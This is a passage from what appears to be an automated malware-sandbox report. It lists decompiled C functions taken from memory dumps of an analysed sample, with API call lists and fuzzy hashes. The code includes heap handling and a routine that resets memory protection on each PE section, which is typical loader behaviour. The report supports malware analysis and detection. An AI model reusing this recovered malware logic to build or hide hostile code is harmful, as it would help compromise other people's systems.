                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04B39390,?,00000000,30314549,00000014,004F0053,04B3934C), ref: 026F6B6B
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,026F61D1), ref: 026F6B7D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                        • Opcode ID: 9b1c69054ebfb65e4a7966103aff253857c7e41f737f207d92be83ae776dea29
                                                                                                                                                                                                                        • Instruction ID: 4134fb27d1ff694dc703969960b09af3359e6d3d171716b21bddf13efaf01d4d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b1c69054ebfb65e4a7966103aff253857c7e41f737f207d92be83ae776dea29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1131B532A00149BFDF91EB94DC88E9E7BBEEF44704F150459B7049B260D771AA65CB50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                                        			E026F5B7A(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t37 = __edx;
                                                                                                                                                                                                                        				_t43 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_push(0x800);
                                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                                        				_push( *0x26fd238);
                                                                                                                                                                                                                        				_t1 = _t43 + 0x26fe791; // 0x6976612e
                                                                                                                                                                                                                        				_t44 = _t1;
                                                                                                                                                                                                                        				if( *0x26fd24c >= 5) {
                                                                                                                                                                                                                        					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                        						_t31 = 8;
                                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                                        						if(_t31 != 0) {
                                                                                                                                                                                                                        							L10:
                                                                                                                                                                                                                        							 *0x26fd24c =  *0x26fd24c + 1;
                                                                                                                                                                                                                        							L11:
                                                                                                                                                                                                                        							return _t31;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t46 = _a4;
                                                                                                                                                                                                                        						_t41 = _v8;
                                                                                                                                                                                                                        						 *_a16 = _a4;
                                                                                                                                                                                                                        						 *_a20 = E026F3769(_a4, _t41); // executed
                                                                                                                                                                                                                        						_t19 = E026F8779(_t41, _t41, _t46); // executed
                                                                                                                                                                                                                        						if(_t19 != 0) {
                                                                                                                                                                                                                        							 *_a8 = _t41;
                                                                                                                                                                                                                        							 *_a12 = _t19;
                                                                                                                                                                                                                        							if( *0x26fd24c < 5) {
                                                                                                                                                                                                                        								 *0x26fd24c =  *0x26fd24c & 0x00000000;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t31 = 0xbf;
                                                                                                                                                                                                                        						E026F5225();
                                                                                                                                                                                                                        						RtlFreeHeap( *0x26fd238, 0, _t41); // executed
                                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t25 = E026F87B0(_a4, _t37, _t44,  &_v8,  &_a4, _t14);
                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                        					_t31 = _t25;
                                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t26 = RtlAllocateHeap(); // executed
                                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t25 = E026F1000(_a4, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                        0x026f5b7a
                                                                                                                                                                                                                        0x026f5b88
                                                                                                                                                                                                                        0x026f5b8f
                                                                                                                                                                                                                        0x026f5b94
                                                                                                                                                                                                                        0x026f5b96
                                                                                                                                                                                                                        0x026f5b9c
                                                                                                                                                                                                                        0x026f5b9c
                                                                                                                                                                                                                        0x026f5ba2
                                                                                                                                                                                                                        0x026f5bca
                                                                                                                                                                                                                        0x026f5be2
                                                                                                                                                                                                                        0x026f5be4
                                                                                                                                                                                                                        0x026f5be5
                                                                                                                                                                                                                        0x026f5be7
                                                                                                                                                                                                                        0x026f5c25
                                                                                                                                                                                                                        0x026f5c25
                                                                                                                                                                                                                        0x026f5c2b
                                                                                                                                                                                                                        0x026f5c31
                                                                                                                                                                                                                        0x026f5c31
                                                                                                                                                                                                                        0x026f5be9
                                                                                                                                                                                                                        0x026f5bef
                                                                                                                                                                                                                        0x026f5bf2
                                                                                                                                                                                                                        0x026f5c01
                                                                                                                                                                                                                        0x026f5c03
                                                                                                                                                                                                                        0x026f5c0a
                                                                                                                                                                                                                        0x026f5c3e
                                                                                                                                                                                                                        0x026f5c43
                                                                                                                                                                                                                        0x026f5c45
                                                                                                                                                                                                                        0x026f5c47
                                                                                                                                                                                                                        0x026f5c47
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5c45
                                                                                                                                                                                                                        0x026f5c0c
                                                                                                                                                                                                                        0x026f5c11
                                                                                                                                                                                                                        0x026f5c1f
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5c1f
                                                                                                                                                                                                                        0x026f5bd9
                                                                                                                                                                                                                        0x026f5bde
                                                                                                                                                                                                                        0x026f5bde
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5bde
                                                                                                                                                                                                                        0x026f5ba4
                                                                                                                                                                                                                        0x026f5bac
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5bbb
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 026F5BA4
                                                                                                                                                                                                                          • Part of subcall function 026F1000: GetTickCount.KERNEL32 ref: 026F101A
                                                                                                                                                                                                                          • Part of subcall function 026F1000: wsprintfA.USER32 ref: 026F1065
                                                                                                                                                                                                                          • Part of subcall function 026F1000: wsprintfA.USER32 ref: 026F1084
                                                                                                                                                                                                                          • Part of subcall function 026F1000: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 026F10B5
                                                                                                                                                                                                                          • Part of subcall function 026F1000: GetTickCount.KERNEL32 ref: 026F10C6
                                                                                                                                                                                                                          • Part of subcall function 026F1000: RtlEnterCriticalSection.NTDLL(04B39570), ref: 026F10D6
                                                                                                                                                                                                                          • Part of subcall function 026F1000: RtlLeaveCriticalSection.NTDLL(04B39570), ref: 026F10F4
                                                                                                                                                                                                                          • Part of subcall function 026F1000: StrTrimA.SHLWAPI(00000000,026FC294,?,04B395B0), ref: 026F112B
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 026F5BC2
                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,?,026F6223,00000002,?,?,?,?), ref: 026F5C1F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$Allocate$CountCriticalSectionTickwsprintf$EnterFreeLeaveTrim
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2048538155-0
                                                                                                                                                                                                                        • Opcode ID: 4ee79b873cd1137f33ca912f2c7c45aec2bde97f3497b22533dae4f238799dfb
                                                                                                                                                                                                                        • Instruction ID: 8649edc8b5ca204c88fef720e0b7a6cd9584d5c53942240a9e9b0a651c6387eb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ee79b873cd1137f33ca912f2c7c45aec2bde97f3497b22533dae4f238799dfb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4219AB1640209EBCF819F68D884F9E37ACEB49344F10542AFB029B240DB30ED91CFA5
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                                        			E02191338(void* __eax, void* _a4) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                        				_t42 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                        				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                        				_v20 = _t42;
                                                                                                                                                                                                                        				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        				if(_t42 <= 0) {
                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                        					return _v12;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t51 = _t50 + 0x24;
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t54 = _v12;
                                                                                                                                                                                                                        					if(_t54 != 0) {
                                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					asm("bt dword [esi], 0x1d");
                                                                                                                                                                                                                        					if(_t54 >= 0) {
                                                                                                                                                                                                                        						asm("bt dword [esi], 0x1e");
                                                                                                                                                                                                                        						if(__eflags >= 0) {
                                                                                                                                                                                                                        							_t33 = 4;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                                        							_t35 = 0;
                                                                                                                                                                                                                        							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                                                                                        						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                                        						_v12 = GetLastError();
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t51 = _t51 + 0x28;
                                                                                                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                                                                                                        					_t31 = _v8;
                                                                                                                                                                                                                        					if(_t31 < _v20) {
                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                        0x02191342
                                                                                                                                                                                                                        0x02191347
                                                                                                                                                                                                                        0x02191353
                                                                                                                                                                                                                        0x02191360
                                                                                                                                                                                                                        0x02191366
                                                                                                                                                                                                                        0x02191368
                                                                                                                                                                                                                        0x0219136e
                                                                                                                                                                                                                        0x021913db
                                                                                                                                                                                                                        0x021913e2
                                                                                                                                                                                                                        0x021913e2
                                                                                                                                                                                                                        0x02191370
                                                                                                                                                                                                                        0x02191373
                                                                                                                                                                                                                        0x02191373
                                                                                                                                                                                                                        0x02191377
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191379
                                                                                                                                                                                                                        0x0219137d
                                                                                                                                                                                                                        0x02191395
                                                                                                                                                                                                                        0x02191399
                                                                                                                                                                                                                        0x021913ad
                                                                                                                                                                                                                        0x0219139b
                                                                                                                                                                                                                        0x0219139b
                                                                                                                                                                                                                        0x021913a1
                                                                                                                                                                                                                        0x021913a5
                                                                                                                                                                                                                        0x021913a5
                                                                                                                                                                                                                        0x0219137f
                                                                                                                                                                                                                        0x0219137f
                                                                                                                                                                                                                        0x0219138b
                                                                                                                                                                                                                        0x02191390
                                                                                                                                                                                                                        0x02191390
                                                                                                                                                                                                                        0x021913be
                                                                                                                                                                                                                        0x021913c2
                                                                                                                                                                                                                        0x021913ca
                                                                                                                                                                                                                        0x021913ca
                                                                                                                                                                                                                        0x021913cd
                                                                                                                                                                                                                        0x021913d0
                                                                                                                                                                                                                        0x021913d3
                                                                                                                                                                                                                        0x021913d9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021913d9
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 02191366
                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 021913BE
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 021913C4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1469625949-0
                                                                                                                                                                                                                        • Opcode ID: 1bfd181387d41ae0cb84dc0ea852add98a7a97b98771e27af95ae724c034b333
                                                                                                                                                                                                                        • Instruction ID: 4ce31af7733fe1128eb5f85552047fadab48498c59f4ef4353bcc8f6496fa491
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bfd181387d41ae0cb84dc0ea852add98a7a97b98771e27af95ae724c034b333
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1216F76D4020AEFEF208F95C880FAEB7F4FB04365F104459E555AB152D3749AC5CB50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E02191280() {
                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                        				void _v32;
                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                                        				intOrPtr* _t37;
                                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t15 =  *0x2194144;
                                                                                                                                                                                                                        				if( *0x219412c > 5) {
                                                                                                                                                                                                                        					_t16 = _t15 + 0x21950f4;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t16 = _t15 + 0x21950b1;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				E021917EF(_t16, _t16);
                                                                                                                                                                                                                        				_t35 = 6;
                                                                                                                                                                                                                        				memset( &_v32, 0, _t35 << 2);
                                                                                                                                                                                                                        				if(E021916AC( &_v32,  &_v16,  *0x2194140 ^ 0xc786104c) == 0) {
                                                                                                                                                                                                                        					_t25 = 0xb;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t26 = lstrlenW( *0x2194138);
                                                                                                                                                                                                                        					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                                        					_t44 = _t26 + _t8;
                                                                                                                                                                                                                        					_t11 = _t44 + 8; // 0xa
                                                                                                                                                                                                                        					_t30 = E02191006(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                                        						_t37 = _v36;
                                                                                                                                                                                                                        						 *_t37 = _t30;
                                                                                                                                                                                                                        						_t32 =  *0x2194138;
                                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                                        							 *(_t37 + 4) = 0;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							memcpy(_t37 + 4, _t32, _t44);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t25 = E02191151(_v28); // executed
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				ExitThread(_t25);
                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                        0x02191286
                                                                                                                                                                                                                        0x02191297
                                                                                                                                                                                                                        0x021912a1
                                                                                                                                                                                                                        0x02191299
                                                                                                                                                                                                                        0x02191299
                                                                                                                                                                                                                        0x02191299
                                                                                                                                                                                                                        0x021912a8
                                                                                                                                                                                                                        0x021912b1
                                                                                                                                                                                                                        0x021912b6
                                                                                                                                                                                                                        0x021912d4
                                                                                                                                                                                                                        0x0219132f
                                                                                                                                                                                                                        0x021912d6
                                                                                                                                                                                                                        0x021912dc
                                                                                                                                                                                                                        0x021912e2
                                                                                                                                                                                                                        0x021912e2
                                                                                                                                                                                                                        0x021912f0
                                                                                                                                                                                                                        0x021912f4
                                                                                                                                                                                                                        0x021912fb
                                                                                                                                                                                                                        0x021912fd
                                                                                                                                                                                                                        0x02191301
                                                                                                                                                                                                                        0x02191303
                                                                                                                                                                                                                        0x0219130a
                                                                                                                                                                                                                        0x0219131e
                                                                                                                                                                                                                        0x0219130c
                                                                                                                                                                                                                        0x02191312
                                                                                                                                                                                                                        0x02191317
                                                                                                                                                                                                                        0x0219130a
                                                                                                                                                                                                                        0x02191326
                                                                                                                                                                                                                        0x02191326
                                                                                                                                                                                                                        0x02191331

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?), ref: 021912DC
                                                                                                                                                                                                                        • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 02191312
                                                                                                                                                                                                                        • ExitThread.KERNEL32 ref: 02191331
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitThreadlstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3726537860-0
                                                                                                                                                                                                                        • Opcode ID: 9e36df28c10b5e95328566b662ae2623d2a92db10921527f9220ad2d35abf223
                                                                                                                                                                                                                        • Instruction ID: d2d3f1ebb9a41e6207364d491e37bc004e561b46477895d87a5dd5d462a273d2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e36df28c10b5e95328566b662ae2623d2a92db10921527f9220ad2d35abf223
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98118B72984202BFDF21EBA1DC88E9777EDAB04314F090C2AE559E7150EB20E299CF51
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                        			E026F37B4(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                                        				intOrPtr* _t50;
                                                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                        				intOrPtr* _t65;
                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t55 = _a4;
                                                                                                                                                                                                                        				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                        				_a4 = 0;
                                                                                                                                                                                                                        				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                        				if(_t76 < 0) {
                                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                                        					return _t76;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t40 = E026F56F9(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                        				_t76 = _t40;
                                                                                                                                                                                                                        				if(_t76 >= 0) {
                                                                                                                                                                                                                        					_t61 = _a28;
                                                                                                                                                                                                                        					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                        						_t52 = _v8;
                                                                                                                                                                                                                        						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t76 >= 0) {
                                                                                                                                                                                                                        						_t43 =  *_t55;
                                                                                                                                                                                                                        						_t68 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t20 = _t68 + 0x26fe1fc; // 0x740053
                                                                                                                                                                                                                        						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                        						if(_t76 >= 0) {
                                                                                                                                                                                                                        							_t76 = E026F90E9(_a4);
                                                                                                                                                                                                                        							if(_t76 >= 0) {
                                                                                                                                                                                                                        								_t65 = _a28;
                                                                                                                                                                                                                        								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                        									_t50 = _a4;
                                                                                                                                                                                                                        									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t45 = _a4;
                                                                                                                                                                                                                        						if(_t45 != 0) {
                                                                                                                                                                                                                        							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t57 = __imp__#6;
                                                                                                                                                                                                                        						if(_a20 != 0) {
                                                                                                                                                                                                                        							 *_t57(_a20);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                                        							 *_t57(_a12);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t41 = _v8;
                                                                                                                                                                                                                        				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                        				goto L18;
                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                        0x026f37ba
                                                                                                                                                                                                                        0x026f37bd
                                                                                                                                                                                                                        0x026f37cd
                                                                                                                                                                                                                        0x026f37d6
                                                                                                                                                                                                                        0x026f37da
                                                                                                                                                                                                                        0x026f38a8
                                                                                                                                                                                                                        0x026f38ae
                                                                                                                                                                                                                        0x026f38ae
                                                                                                                                                                                                                        0x026f37f4
                                                                                                                                                                                                                        0x026f37f9
                                                                                                                                                                                                                        0x026f37fd
                                                                                                                                                                                                                        0x026f3803
                                                                                                                                                                                                                        0x026f3808
                                                                                                                                                                                                                        0x026f380f
                                                                                                                                                                                                                        0x026f381e
                                                                                                                                                                                                                        0x026f381e
                                                                                                                                                                                                                        0x026f3822
                                                                                                                                                                                                                        0x026f3824
                                                                                                                                                                                                                        0x026f3830
                                                                                                                                                                                                                        0x026f383b
                                                                                                                                                                                                                        0x026f3846
                                                                                                                                                                                                                        0x026f384a
                                                                                                                                                                                                                        0x026f3854
                                                                                                                                                                                                                        0x026f3858
                                                                                                                                                                                                                        0x026f385a
                                                                                                                                                                                                                        0x026f385f
                                                                                                                                                                                                                        0x026f3866
                                                                                                                                                                                                                        0x026f3876
                                                                                                                                                                                                                        0x026f3876
                                                                                                                                                                                                                        0x026f385f
                                                                                                                                                                                                                        0x026f3858
                                                                                                                                                                                                                        0x026f3878
                                                                                                                                                                                                                        0x026f387d
                                                                                                                                                                                                                        0x026f3882
                                                                                                                                                                                                                        0x026f3882
                                                                                                                                                                                                                        0x026f3885
                                                                                                                                                                                                                        0x026f388e
                                                                                                                                                                                                                        0x026f3893
                                                                                                                                                                                                                        0x026f3893
                                                                                                                                                                                                                        0x026f3898
                                                                                                                                                                                                                        0x026f389d
                                                                                                                                                                                                                        0x026f389d
                                                                                                                                                                                                                        0x026f3898
                                                                                                                                                                                                                        0x026f3822
                                                                                                                                                                                                                        0x026f389f
                                                                                                                                                                                                                        0x026f38a5
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F56F9: SysAllocString.OLEAUT32(80000002), ref: 026F5756
                                                                                                                                                                                                                          • Part of subcall function 026F56F9: SysFreeString.OLEAUT32(00000000), ref: 026F57BC
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 026F3893
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(026F8CCC), ref: 026F389D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 986138563-0
                                                                                                                                                                                                                        • Opcode ID: 87945b48ccc99a8b56c879475fbc91cca2595b554a9d1420241aa755a4f3ef6b
                                                                                                                                                                                                                        • Instruction ID: 7ba58e2ce300a4bf6b75a0f77edb829c45650f207ccff748efd563faad1f09e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87945b48ccc99a8b56c879475fbc91cca2595b554a9d1420241aa755a4f3ef6b
